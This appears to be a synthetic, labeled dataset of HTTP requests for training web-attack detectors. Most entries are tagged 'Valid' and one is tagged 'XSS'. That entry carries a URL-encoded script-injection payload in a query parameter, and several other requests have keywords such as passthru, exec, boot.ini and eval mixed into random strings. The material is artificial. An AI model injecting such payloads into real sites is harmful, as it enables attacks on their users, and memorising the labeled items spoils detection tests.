null

End - Id: 35581
Start - Id: 416
class: Valid
GET /edastmqest1/rs/edmZ0NoFTVpi-ro/o8zhyx1/ou90wspndemtd/srifppieahnl/riata.asp?s6sileasordree=ais2nhnxibhreIe&t6z4-Dw=hmD99&3k4Cluerih3egrh=eu&uwiloq=%25div+rcp&chW0lexecGKEznR=rdUe&sw=8280&CeeiletUe=65&OjkgXtscriptlC31=9353340 HTTP/1.1
Host: 162.37.204.29
Connection: close
Accept: text/*, video/*;q=0.7
Accept-Charset: iso-8859-5;q=0.6, utf-7;q=0.4, iso-2022-jp, iso-2022-kr
Accept-Encoding: 
Accept-Language: ohn-donxee;q=0.8, hsabdgsi-efwtntoh, o-lAwfmc;q=0.0, nidqt-fiot5m;q=0.9, wimiAe0-ufief;q=0.2
Cache-Control: only-if-cached
Client-ip: 54.33.113.204
Cookie: 13iYv6ELR=h
Cookie2: $Version="17"
Date: Mon, 20 Apr 09 05:10:20 UTC
ETag: "2TfC2JU62zzdhHb5I"
Expect: 100-continue
From: rPtoKwaw@nOdai.biz
If-Modified-Since: Thu, 06 Jul 06 12:50:52 UTC
If-Unmodified-Since: Sun, 03 Feb 08 14:18:01 CET
If-Match: "wgXFZ02@LKHzvr04aWf"
If-None-Match: "JELitddlCrvVfZPFu"
If-Range: Tue, 21 Mar 06 19:31:39 UTC
Max-Forwards: 8387
MIME-Version: 6.5
Pragma: tooTC='rO'
Proxy-Authorization: Basic Y3RyYWIyblk6dWV3bjJxaA==
Authorization: reSmaG iooeb2=sinifhAE
Range: 63476-77033,-529,5-
Referer: http://www.zMxlto.ch/rloE/mmRj.pl
TE: trailers,gzip
Trailer: Trailer
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 9.3; ie-ho; rv:2.3.3) Gecko/03746200
UA-CPU: Sparc
UA-Disp: 810,8513,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7545x2141
Via: HTTP/1.3 30.79.73.213:8, 8.1 174.152.70.123
Transfer-Encoding: compress
Upgrade: t3uow/0.2, 6nnat/6.0, iR9/7.3, tts/0.0
Warning: 942 91.154.237.154 "h59jnrdncehalTSdatn" "Tue, 19 Oct 04 16:05:21 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 416
Start - Id: 10502
class: Valid
GET /etchtaccesI-Y.kSyM/mMETERdZ3K9WDAOfJ_Y/gQb.html?zeifsooUr=erp4 HTTP/1.1
Host: www.xseesyfs8n.fr:80
Connection: close
Accept: video/mpeg;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: t8naAus-i8isE3i
Cache-Control: no-cache
Client-ip: 85.57.15.169
Cookie: e5eqoecsJn=cut83etceenNe;smo=d;ott5arishse=sn%ug;UlvhttpslXh.T=hrl$)6>o6
Cookie2: $Version="721"
Date: Mon, 24 Jul 06 09:25:46 GMT
ETag: W/"meu-jUaTc8JG1r.eMw"
Expect: 2gTdo
From: Po3inu1@xey4eI7tu.fr
If-Modified-Since: Tue, 22 Dec 09 03:40:59 GMT
If-Unmodified-Since: Sun, 22 Jun 08 17:38:33 GMT
If-Match: *
If-None-Match: ".W8t-0mLugb5RSBCk"
If-Range: *
Max-Forwards: 74
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: Basic UnRvdjpnbjZIdHBkdQ==
Range: 29-
Referer: /egeiieas/nrsanaey/7dad/kqm3p.gz
TE: trailers,trailers,deflate
Trailer: Authorization
User-Agent: 9teeEqeCih/8.7.0.3.8
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: HTTP/8.6 www.i00ere.jpg
Transfer-Encoding: identity
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 364 17.253.249.140 "d4vHRriaUr2lxnus5tt" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 98147817279
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10502
Start - Id: 10814
class: Valid
GET /cec6ztansCom/UeQtBlceosultbon9r/tutolwr/uZNrvIgLSLZX9ANiYPE1/6e7althrali9huntol.css?-l6qpassthrujXbeTx=8rDftasLg1n&tti=22066074&ibRMolLgauZ=77052853&s1isAk=u+48positionr+iod&caeyiTo26=90822822&at3LCyoc=875129 HTTP/1.1
Host: www.40oyluef.biz:80
Connection: nestSart
Accept: video/mpeg, application/zip, application/*
Accept-Charset: koi8, hz-gb-2312;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 193.6.44.12
Cookie: t3hincgImsih=o;7WA2g=594634;rzepn8atswet4=Dls;eat9meonpp=io8gsgsgh;pblGDo9a-IP=esuEw group bynbmila
Cookie2: $Version="637"
Date: Mon, 15 Aug 05 03:42:56 GMT
ETag: "PfHdtwpXNxii0@hqH96"
Expect: 100-continue
From: eatiedI@0aabliaA.fr
If-Modified-Since: Tue, 25 Mar 08 17:31:13 UTC
If-Unmodified-Since: Wed, 13 Dec 06 18:51:49 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 25 May 07 09:16:05 CET
Max-Forwards: 396
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest opaque="ioofo"
Authorization: NTLM aWh1QWF1c3NzZWxsZW5vb2lnYXNFcmRzZXRtMGNlZGd0bg==
Range: -605203
Referer: /peirrlg/dneeenAo/qeerrua.mdb
TE: chunked;q=0.8,chunked,deflate;q=0.4
Trailer: TE
User-Agent: 0ettkgt/2.9.0
UA-CPU: MIPS
UA-Disp: 6045,6650,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 633x671
Via: FTP/8.8 171.5.135.48
Transfer-Encoding: compress
Upgrade: r6rit/3.5
Warning: 843 www.azedsimW.gif "temerreckTAn" 
X-Forwarded-For: 87.0.224.171
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10814
Start - Id: 19498
class: Valid
GET /hazry0s5nras/t4Y.Mqm_o/AtcSNDhraisLjhgTKnxi/8f6klrKiCa9ow8/iNtpR2eKcLQhp_6.gG/netyeic91xy/n1lz.css?anrombdrCLt7rww=g6ce&rsroupsrhbtV7le=i%24 HTTP/1.1
Host: 25.4.144.64
Connection: keep-alive
Accept: audio/basic, video/*;q=0.4, application/x-tar
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.5, gzip;q=0.5
Accept-Language: neakNrnu-e
Cache-Control: no-store
Client-ip: 29.15.143.71
Cookie: w8n6nssa='etsudeH9metav8
Cookie2: $Version="8"
Date: Mon, 13 Jun 05 22:08:26 GMT
ETag: "Ui2cn1RVpmf8LNM-0C9U"
Expect: Ota8itr=37su6o;yrhfelu=lEih
From: oeonm@ce9paig.cz
If-Modified-Since: Fri, 15 Jan 10 20:17:31 UTC
If-Unmodified-Since: Wed, 09 Aug 06 11:50:46 CET
If-Match: "a9oruW2XYTflIpgZAV"
If-None-Match: "_T4p5fodRDpzXmAhD@og"
If-Range: Sat, 29 Oct 05 12:57:13 UTC
Max-Forwards: 0
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: Basic Sm9kaXVpOmk0SWE=
Range: 3024-,3311-971779,259112-9
Referer: http://www.re7tdoce.it/rqeneYw3/gntstd7.msf
TE: chunked;q=0.8,deflate;q=0.8,trailers
Trailer: Accept-Encoding
User-Agent: sJI6-rNSwv http://www.dtqves.de
UA-CPU: x86
UA-Disp: 190,715,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 570x2839
Via: 5.8 www.eaesu2.html
Transfer-Encoding: gzip
Upgrade: bpjc/2.9, garUt/9.6, exo/6.6
Warning: 268 166.16.219.16 "mps4ifoosslaoso" 
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19498
Start - Id: 4160
class: Valid
POST /6stTenienrijac/sOzXfw2luool.mspx? HTTP/1.0
Content-Length: 91
Content-Language: Itret,i,a
Content-Encoding: deflate
Content-Location: /yteI/u6viH/Ectmle/tiohdwe.dll
Content-MD5: bHJlZXN0cmxyaHc3dGVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Jan 07 20:24:06 GMT
Last-Modified: Fri, 24 Apr 09 10:38:34 CET
Host: 188.119.139.140
Connection: close
Accept: */*;q=0.2
Accept-Charset: ks_c_5601-1987, iso-8859-9;q=0.8, iso-2022-kr, x-mac-greek, iso-10646-ucs-2;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 27.207.2.84
Cookie: ss=78893218
Cookie2: $Version="772"
Date: Tue, 26 Jun 07 17:58:47 GMT
ETag: W/"TOzFfs1syesKdnln"
Expect: hjEoi=mo2dsl
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Fri, 21 Mar 08 10:15:02 UTC
If-Unmodified-Since: Fri, 14 Jul 06 03:25:05 GMT
If-Match: "lhsTEVPsVITnApvtSIX"
If-None-Match: "nImZHRa8Txpoghq6"
If-Range: Sun, 23 May 04 02:50:34 UTC
Max-Forwards: 7
MIME-Version: 3.7
Pragma: Onla=kteneylp
Proxy-Authorization: NTLM dUg3bXQxdWl1b2VJZVFtZmlvckNibkllYXVuc2NkaHJyMDFwZQ==
Authorization: NTLM aG9hbHRDY2F0ZGVucmV0c0FsZW9xaHJpZ2Q3YWx0MmFJbGFlaGRhOQ==
Range: -9,-905
Referer: http://deiiiodn.biz/llouetw.sh
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.5 (Machintosh; U; PPC 8.6; gh-di; rv:0.2.5) Gecko/68842108
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 872x878
Via: FTP/4.3 173.1.82.222, FTP/1.4 www.dgazy3.js, 8.3 www.tl1ese.htm
Transfer-Encoding: 8dxl; 5dnNetcr=aiefuy
Upgrade: ahpr/8.4, iraUdd/9.2, cnc6/0.3
Warning: 033 www.ht6forRg.shtml "vwcfh1evolhtnobct" 
X-Forwarded-For: 182.55.25.220
X-Serial-Number: 5833814723
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

owutan4=]lcngt|ddrvmr&7hoea0i=pjoh(lsLhomekDn7(rbS%j&xitI0eh3saNa=atyN;ilcialbt

End - Id: 4160
Start - Id: 9877
class: Valid
GET /te4hbFmt@qxDT/puq9@C0p9EA_ezfq3/ii@nS-/mboot.iniJ.jpeg? HTTP/1.1
Host: www.oneoiw.cz
Connection: 126ek
Accept: audio/basic;q=0.2, text/html, text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: tgp8hAg-r;q=0.5, r-lrqs, 6ovl-TGnhMrS, tsHatb9-hd67vu;q=0.2
Cache-Control: themh=nuOsrh
Client-ip: 2.83.32.9
Cookie: fbsTie6mt=19;rl=openhii8whfO;otmpXa=linko
Cookie2: $Version="8"
Date: Sun, 01 Feb 09 09:30:19 UTC
ETag: W/"BQerhvoldaz0.g2"
Expect: 100-continue
From: vtou@ndnw.net
If-Modified-Since: Sat, 07 May 05 10:18:19 CET
If-Unmodified-Since: Sun, 13 Jul 08 04:52:24 CET
If-Match: "W4_6XqH9c-KqUFqV"
If-None-Match: *
If-Range: "NTqr78Dl790Gq1BTqz0_"
Max-Forwards: 657
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic eWZhbTp0dXRoNjU=
Authorization: Digest response="8E14937E2cA8d70470EdAb3B4C1ECE38"
Range: -41393,134251-41032
Referer: /s8nnlex/nrmec/cWa8rD.png
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: Mozilla/4.2 (X11; U; Solaris 0.6; ri-ab; rv:2.5.8) Gecko/18046998
UA-CPU: MIPS
UA-Disp: 042,750,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 620x416
Via: rac4lh/6.4 60.5.34.39
Transfer-Encoding: meOiy
Upgrade: yhtcs/6.2, t3ran/9.0, Atns/4.1, eaxi/4.7, qZt/2.6
Warning: 563 www.otrl.html:54051 "ecBsinbfo" "Wed, 01 Aug 07 21:20:22 CET"
X-Forwarded-For: 197.251.52.207
X-Serial-Number: 09946739061718
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9877
Start - Id: 6109
class: Valid
POST /ycriylnphNlfqRuca5/6Qsb/zls894LoVif4vSmin0NK/n8/aaR/fHBeHwMl7/2nlhltrteaoguuceio/fcrElwsoV9gS/n0aiwnodtta.js? HTTP/1.1
Content-Length: 92
Content-Language: s5deE,ede4se,dsmd
Content-Encoding: compress
Content-Location: http://shfim.org/unea/iydssOr/tlscosop.cfm
Content-MD5: dE50SDcwZXBjd3F0SGFhZg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Oct 04 07:19:03 GMT
Last-Modified: Thu, 10 Jul 08 04:37:12 GMT
Host: 30.142.67.197
Connection: keep-alive
Accept: video/mpeg, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 53.107.10.147
Cookie: I.likeG3SeXr=0;eoaeAi=tdflvzk.Mx;Tnaew4lsts=7 Adlrifoh
Cookie2: $Version="97"
Date: Sat, 26 Jul 08 14:48:03 UTC
ETag: W/"lv6u5s20GnsOuQe9be4Q"
Expect: mEhD=y8nam
From: nwqTu@iinmi.st
If-Modified-Since: Wed, 06 Oct 04 19:54:54 UTC
If-Unmodified-Since: Mon, 11 May 09 08:21:47 CET
If-Match: *
If-None-Match: "p9GwTCq-H8YEvhGky"
If-Range: "R1HSnYKrsLrw@hQF9"
Max-Forwards: 57
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM b3hpaDV0NGV1ZWhyc3JvcGVyZW9HcmFTdG5uYUFUaXI=
Authorization: is2i ip2gnLal=rias
Range: 679-,5829-
Referer: http://www.neaneow.de/seydxao/1nfh/dtl4o6el/atrkt2e/AyllI3d.jpg
TE: chunked;q=0.4,gzip;q=0.4
Trailer: Host
User-Agent: deHqexnCe (hlVqTFcd; njSnkSYLaG; osjZa@bZ3K; erudjwjC4C; agXpBm5qEg)
UA-CPU: PowerPC
UA-Disp: 395,743,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4456x1785
Via: HTTP/6.6 www.2rri.jpg:7852, HTTP/9.7 157.56.12.130, 7.5 www.cttgm.htm
Transfer-Encoding: deflate
Upgrade: mndT8/4.5
Warning: 650 69.47.85.230 "eneld6Odeonlenmnn" "Tue, 12 Aug 08 13:16:53 CET"
X-Forwarded-For: 224.40.113.11
X-Serial-Number: 89346832324261469384
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

owt=oo&dtEayAenesge=t.RgOV9&lepoe32otogoEo=mExMeX1F&lib0TY=eAtps:e&10VxYxDpZQ=096083&oo=o 

End - Id: 6109
Start - Id: 33075
class: Valid
POST /hZXTbvxgQyPmVC4.jpeg? HTTP/1.1
Content-Length: 261
Content-Language: aoNe8eeo
Content-Encoding: deflate
Content-Location: http://kretn.cz/nOeGw1/ngrintl/sdtgl/u4rfn/heIel2i.asmx
Content-MD5: ZXR0dGlkUm9zaXRlbm9hdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 14 Apr 05 07:49:46 CET
Last-Modified: Fri, 18 Mar 05 11:50:43 GMT
Host: www.ba9clo.be:80
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 204.103.118.185
Cookie: Oel4hpeebs5=540;TvHk=yPlaiooaahem;eljreepAhwrioNs=n0ltrZh
Cookie2: $Version="0"
Date: Wed, 14 Apr 04 02:07:15 UTC
ETag: W/"gqIWxsvwAx.L8aUb"
Expect: rrra
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Fri, 03 Jul 09 17:14:28 GMT
If-Unmodified-Since: Sat, 04 Oct 08 17:03:53 UTC
If-Match: *
If-None-Match: "I8loCVB_fScsfY3BQKsL"
If-Range: *
Max-Forwards: 1
MIME-Version: 3.9
Pragma: a=vIn
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bjRpc2h4OmF3dVczbQ==
Range: -627,-76122
Referer: /5rEE/aeteN/3OEn/xteod.swf
TE: gzip,gzip,gzip
Trailer: If-Match
User-Agent: 66k2n2tee
UA-CPU: MIPS
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 697x1733
Via: 9.1 88.201.79.212, HTTP/1.2 www.htesfhlt.png, 9.3 251.143.91.225
Transfer-Encoding: gzip
Upgrade: isOe/5.3, tbghye/7.5, oos/8.8, oSDrsu/0.3
Warning: 367 www.NNtthSs.tiff "ei0asr" "Mon, 07 Apr 08 05:52:20 CET"
X-Forwarded-For: 205.136.153.13
X-Serial-Number: 2009160031726979152
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7e=2240917&B5XZDpassthruryAe3=eh8ear7sQ;x&da4n=9669901&wB9ssONtia=eoe1>&oue=oAdI36TKOD2&nhfspe=541794&sktrnlurqsijo=76&WGA7JptK98cmd2=124294532&eghsElbei=06&Oaajas9cjweo=m76pay&gcshillTorih=d0ddasam&iilnku=4suido&uotM=ncboot.inieeia3di&sexi3otiteaeOwt=86361

End - Id: 33075
Start - Id: 32005
class: Valid
GET /xepootIndwrar9/tTuseeneIkde/daIweesrdtmEahoncoi/nGvWiQ6ccQl./o@OPzb24Tq6tUN/ol6asFRjc/lkbh7I@uH9IYgDxmMs/helS8up9/t_rDt7.shtml?mte2zttiur3aoe=8&oree9=73&xwcEstiiadu=t.wVwB17I&nsteg=cqlifa7w66&0yaiIemniot=347&liylytiezirp2tr=ymbrhNyjtegqlinku&2swo=ym&hTsUo=tiaphpeSyc6documenta%27nlbsCwt&vonhedJte=%5CtrmEeiresmixi&JphpevalBnCwp-bodyk6XO=059&tto=2819&syntpaa=aam%3C4ss3d9 HTTP/1.0
Host: 114.192.253.240:64787
Connection: keep-alive
Accept: image/*, text/*, audio/*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.1, deflate, gzip, gzip;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 57.1.164.246
Cookie: as7trNacnslk=io;cha8s58aiS=7064
Cookie2: $Version="84"
Date: Sat, 15 Jul 06 01:08:08 GMT
ETag: W/"62EQy0A@rYLlc1BQfzKJ"
Expect: 100-continue
From: btva@toc2c.st
If-Modified-Since: Fri, 16 Oct 09 24:19:25 UTC
If-Unmodified-Since: Sun, 25 Feb 07 09:57:55 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Jan 05 06:04:11 UTC
Max-Forwards: 6
MIME-Version: 9.4
Pragma: lt=nnins
Proxy-Authorization: Basic ZHJocXJ6dTA6d3J0YWE=
Authorization: 2ehl amhs=fihlhnao
Range: 42992-
Referer: /daLeia/ohnas3.mp3
TE: chunked;q=0.2,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/3.1 (Windows; U; WinNT 7.1; 4s-ai; rv:2.3.2) Gecko/56887590
UA-CPU: Sparc
UA-Disp: 612,8755,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 879x932
Via: nlxtn/4.2 www.qaquGae.css:4, FTP/5.3 www.eetsuiog.htm:9103
Transfer-Encoding: jptem
Upgrade: idoj/6.1, g7eoil/4.7, cotot/9.8, ewrnb/5.4, 2axs/6.7
Warning: 808 www.ijlnho.jpg "ret3nreoOTgbbr" "Sun, 29 Jan 06 04:11:57 GMT"
X-Forwarded-For: 34.245.202.84
X-Serial-Number: 2079694360100759
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32005
Start - Id: 774
class: Valid
GET /kshutdownXwnftpoc3M2UOr%u/smMQsystemzzy0Hr/gPdivmqj7hJqMeUOf/uCtsav49wqKEks/CtCY1.mdb? HTTP/1.1
Host: www.Qteeah.gov:80
Connection: rEr9deee
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 83.119.31.221
Cookie: yisrhopVies7s=orua
Cookie2: $Version="29"
Date: Thu, 26 Oct 06 11:39:24 CET
ETag: W/"hIeDfmJrE.yv4EFj"
Expect: tcNWgin=hrHalpcd;eQaelket
From: kkwee@uev2tN.ch
If-Modified-Since: Fri, 24 Aug 07 06:11:57 CET
If-Unmodified-Since: Fri, 04 Jun 04 04:52:00 GMT
If-Match: "fXBFb-F-i7sV5w0wft"
If-None-Match: "AWIXx2aNiDtnslt3@zxT"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.6
Pragma: aa2raxs=t
Proxy-Authorization: Digest opaque="peradza"
Authorization: Basic ZERob2V1cWE6b3lhZQ==
Range: 74705-710
Referer: http://www.0eLNo.net/rUnsr/d7dstzi/ue5ou.jpeg
TE: gzip,trailers
Trailer: Range
User-Agent: odCS8LE http://www.nelrtte.fr
UA-CPU: PowerPC
UA-Disp: 4382,1693,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 260x3490
Via: 3.6 184.197.93.4, rm1/2.5 11.116.105.41, nhiyo/6.9 23.132.116.51
Transfer-Encoding: compress
Upgrade: zufZE2/7.5, owei/6.5, slroee/5.9
Warning: 393 16.23.206.208 "aeeyywi82NiChtaec" 
X-Forwarded-For: 69.243.92.99
X-Serial-Number: 40823
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 774
Start - Id: 2707
class: Valid
GET /no2jQ_6XFU7/eqyjw8X9qNN.J/PB3rpzSnp/hGfqmochawhS/wJBwz7d-UenxNPGi/uaedpvierhgSep/o8cQTx_c/d3xAF4qQ7n@m4-3.css? HTTP/1.1
Host: www.eeeegtoo.uk
Connection: keep-alive
Accept: application/*;q=0.1, audio/x-wav, image/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: 5bh2ndo4-cahsoP0
Cache-Control: max-stale=663
Client-ip: 118.196.176.82
Cookie: na7lntdhl=tevalcyalloBwed]orfhftisAi;yievibmrr=tthfUotnaeni;fiocsdsUsheAoc=76
Cookie2: $Version="537"
Date: Thu, 15 Dec 05 13:42:16 CET
ETag: "tItqd5tA_J@DpVg"
Expect: 100-continue
From: Xedq@e0oeMo.uk
If-Modified-Since: Fri, 06 Feb 04 01:22:25 GMT
If-Unmodified-Since: Tue, 12 Aug 08 03:33:59 CET
If-Match: "G8VrFJf4-waUmKmp"
If-None-Match: *
If-Range: *
Max-Forwards: 80
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: TDiak nmect4=aIienlh
Range: 800-526712,0803-
Referer: /2iiqh/cAzv.cfm
TE: trailers,deflate,deflate
Trailer: Host
User-Agent: R4si (s0H2AYp; oyW3RfXg; aSAciAOw.; aUVCVo; hoZDGq_c4p)
UA-CPU: 68000
UA-Disp: 153,380,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 486x934
Via: EeEiDe/3.5 34.223.234.164
Transfer-Encoding: compress
Upgrade: foys/2.8, sSboa/7.3, alt/9.7, arhxe/9.3, g5ee4a/9.9
Warning: 618 www.isvroab.html "hmysacdeseenneluAtm" "Fri, 02 Jun 06 09:20:31 CET"
X-Forwarded-For: 45.109.116.108
X-Serial-Number: 053261538285243
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2707
Start - Id: 47499
class: XSS
GET /zXx_iS9sWDqNmG07kYrN/rdNoistseFhtanmc/ssuoeteooHltDhq/lA1F7X1vdczul/o5/cplnar4Brosn/_xo.php4?sea=3Ngrotphieft4g10&xt0rtee=%3Cxml+++++id%3D+++%22++++X++++%22++++%3E%3Ca+%3E%3Cb++%3E%26lt%3Bscript%3E%5Balert+%28%27oet%27%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++%3E%3C%2Fa++++%3E%3C%2Fxml%3E HTTP/1.1
Host: 95.21.200.241
Connection: close
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: eoNoHbr4-aseiPe;q=0.8, elv-dmir22;q=0.9, arz-ho;q=0.7, tmw-zefnuI, aeeln-sr
Cache-Control: max-age=08774
Client-ip: 121.61.23.210
Cookie: emahgsdcedinet=ohemi;nzehhatapl=305098573
Cookie2: $Version="037"
Date: Sat, 28 Apr 07 22:00:26 CET
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: 100-continue
From: hD4h@iejie.gov
If-Modified-Since: Fri, 21 Jan 05 04:30:17 GMT
If-Unmodified-Since: Tue, 05 May 09 21:21:18 GMT
If-Match: *
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Thu, 24 Sep 09 10:13:13 UTC
Max-Forwards: 34
MIME-Version: 4.9
Pragma: nheqsgo='lToex'
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: /et1atzt/iLaY.asp
TE: trailers,trailers
Trailer: Authorization
User-Agent: daAk (5g6JYAd; eVu3XdE; tm@EgvC; rnlARyLQs)
UA-CPU: x86
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: fnAhun/6.5 www.eh33mol.gif, HTTP/2.4 www.hI34iv.png, 0.2 171.144.220.41
Transfer-Encoding: gzip
Upgrade: mrsd/9.5, owur/3.3
Warning: 771 227.153.234.137 "zyfairhnrumgfhbhiV" "Thu, 01 Jan 09 02:19:05 CET"
X-Forwarded-For: 121.171.235.172
X-Serial-Number: 48112496441051
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47499
Start - Id: 19118
class: Valid
GET /nziopzp-/exwy2MLA@jjJg/oiHCBS9WAydU/iwdi/dqsam3.htm?xX_JU6a=t04nl%3A0actlua+on7&ub0te30Apscnge=ne%3C&mteAna=yqytekeeAea&lWnbaelfa=34672210 HTTP/1.1
Host: 211.181.167.50
Connection: keep-alive
Accept: application/rtf
Accept-Charset: iso-8859-8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 250.159.224.244
Cookie: eicioeidel3e6=3457426;uswoDoihi=eyep;aeewf9=alr0esNrtszn7ox;sZhmsv=rt s
Cookie2: $Version="4"
Date: Thu, 21 Dec 06 13:28:51 CET
ETag: "MvwF0GORgSlvksONE"
Expect: cOro4
From: eono6e9@e4noq.fr
If-Modified-Since: Sun, 29 Jun 08 08:45:48 GMT
If-Unmodified-Since: Sat, 03 Apr 04 23:52:51 GMT
If-Match: *
If-None-Match: "f6v0.tdT2BBF7NXu"
If-Range: Sun, 17 Jul 05 03:36:39 GMT
Max-Forwards: 8970
MIME-Version: 3.6
Pragma: n8='d6ernc'
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: Digest nonce
Range: 83457-7
Referer: /LeEH8/bgwqhez/topi.png
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.9 (compatible; laeikr; Linux i586; tcpimado)
UA-CPU: x86
UA-Disp: 531,060,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 315x9224
Via: 8.5 189.209.35.116, FTP/5.3 247.47.145.52
Transfer-Encoding: identity
Upgrade: acA9M/5.5, taudh/0.0
Warning: 335 www.ekmeiB.jpg "0lne" "Wed, 30 May 07 03:16:49 UTC"
X-Forwarded-For: 168.136.167.141
X-Serial-Number: 2665334656610459
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19118
Start - Id: 18649
class: Valid
GET /L3zPhGHY0dYinsertgorP/yao0uo2lrla/o6rae/sadulsEAElni/uLj_mJ4.tiff?qP7child.c=792&slGcnewtefeeaw=2133&Ur6=hn1hhM0sonE&VGgNY=%5Betc&l7ad2edeiiEo=85119411&1_j-OrnI58=noh&oq=ibaokLsnoy7l&oqgesanaibner=+ HTTP/1.0
Host: 16.213.91.62
Connection: zpTma
Accept: */*;q=0.7
Accept-Charset: windows-1255;q=0.6, windows-1252;q=0.5, iso-8859-8-i, iso-8859-2
Accept-Encoding: 
Accept-Language: mcsN-soiysnel
Cache-Control: no-cache
Client-ip: 101.67.133.106
Cookie: zwindow.open8n=l4YN_jw;m2@7httpg1Bnull=l_O;lirjtvrvm0segT=o;iii2elo=t2t;aagiqph8dTdcc=j.lX2aznmJuc
Cookie2: $Version="42"
Date: Mon, 15 Mar 10 13:32:42 GMT
ETag: W/"-T4eoO3.CDM2BJMSY"
Expect: Naud=docmmtt;rdrdTo
From: dhoiTi@6ndiEy.ch
If-Modified-Since: Thu, 10 May 07 20:41:00 UTC
If-Unmodified-Since: Wed, 12 Dec 07 14:10:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 686
MIME-Version: 5.2
Pragma: no-cache
